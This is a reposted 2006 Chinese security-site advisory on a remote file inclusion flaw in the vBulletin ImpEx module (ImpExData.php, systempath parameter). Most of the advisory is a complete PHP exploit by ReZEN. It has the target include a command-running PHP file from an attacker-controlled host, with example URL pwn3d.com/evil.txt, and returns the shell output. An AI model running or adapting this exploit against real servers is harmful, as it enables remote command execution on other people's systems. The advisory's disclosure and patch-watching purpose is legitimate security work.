联系站长
加入收藏
会员登陆
 您的位置: 情长在线 >> 文章文献 >> 漏洞资料 >> By 情长在线(F.N.S.T)
   □  vBulletin ImpEx模块远程文件包含漏洞    3星级
vBulletin ImpEx模块远程文件包含漏洞
[作者:佚名    转贴自:Internet    点击数:    更新时间:2006-3-24    文章录入:一生情长]
【字体:

vBulletin ImpEx模块远程文件包含漏洞

发布日期:2006-03-23
更新日期:2006-03-23

受影响系统: VBulletin ImpEx <= 1.74描述: BUGTRAQ  ID: 17206

vBulletin是一款开放源代码PHP论坛程序。

vBulletin程序在实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。

在vBulletin的ImpEx模块中,ImpExData.php没有正确的过滤对systempath参数的输入,导致可以包含任意外部或本地的文件。具体来说:

require_once ($systempath . 'impex/ImpExDatabase.php');

在require_once()函数中使用之前没有设置$systempath变量,导致了上述漏洞。

<*来源:ReZEN (rezen@xorcrew.net
 
  链接:http://secunia.com/advisories/19352/print/
        http://www.xorcrew.net/xpa/XPA-ImpEx.txt
*>

测试方法: 警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

-----BEGIN-----

<?php
/*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
    ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
    ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
    ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
    ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
    ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
    echo "<p>Unable to get output.\n";
    exit;
}

echo $form;

while (!feof ($file)) {
    $line .= fgets ($file, 1024)."<br>";
    }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>


------END------

建议: 厂商补丁:

VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vbulletin.com/docs/html/impex
  • 上一篇文章:Orion Application Server JSP源码泄露漏洞
  • 下一篇文章:没有了
    		•
    发表评论   □ 告诉好友   □ 打印此文  □ 关闭窗口
     最新10篇热点文章
    SQL SERVER2000安全解决方…[206]
    Linux集群在银行信息化中的…[210]
    巧用Linux2.6内核新功能配…[313]
    Linux DHCP网络故障排除事…[158]
    手把手教您配置Liunx目录服…[389]
    Linux下安装和使用杀毒软件…[262]
    (MS06-007)IGMP v3 DoS Ex…[256]
    FarsiNews Remote File In…[158]
    Apple Mac OS X File Rewr…[188]
    BomberClone Buffer Overf…[267]
    		 
     最新10篇推荐文章
    手把手教您配置Liunx目录服…[03-25]
    Linux下安装和使用杀毒软件…[03-25]
    (MS06-007)IGMP v3 DoS Ex…[03-25]
    BomberClone Buffer Overf…[03-25]
    vBulletin ImpEx模块远程文…[03-24]
    网络安全论文专题[03-23]
    服务器、网络安全解决方案…[03-23]
    服务器常见故障的诊断与解…[02-26]
    探寻适合小型企业的网络安…[02-26]
    交换机配置中的安全性[02-26]
    		 
     相 关 文 章
      ◇  网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
     设为首页  加入收藏  关于本站  免费服务  广告服务   归档中心   站点地图  版权申明  联系站长  友情链接
    Copyright© 2001-2005 F.N.S.T Fineacer.Org .All Rights Reserved ICP备案:粤ICP备05002156号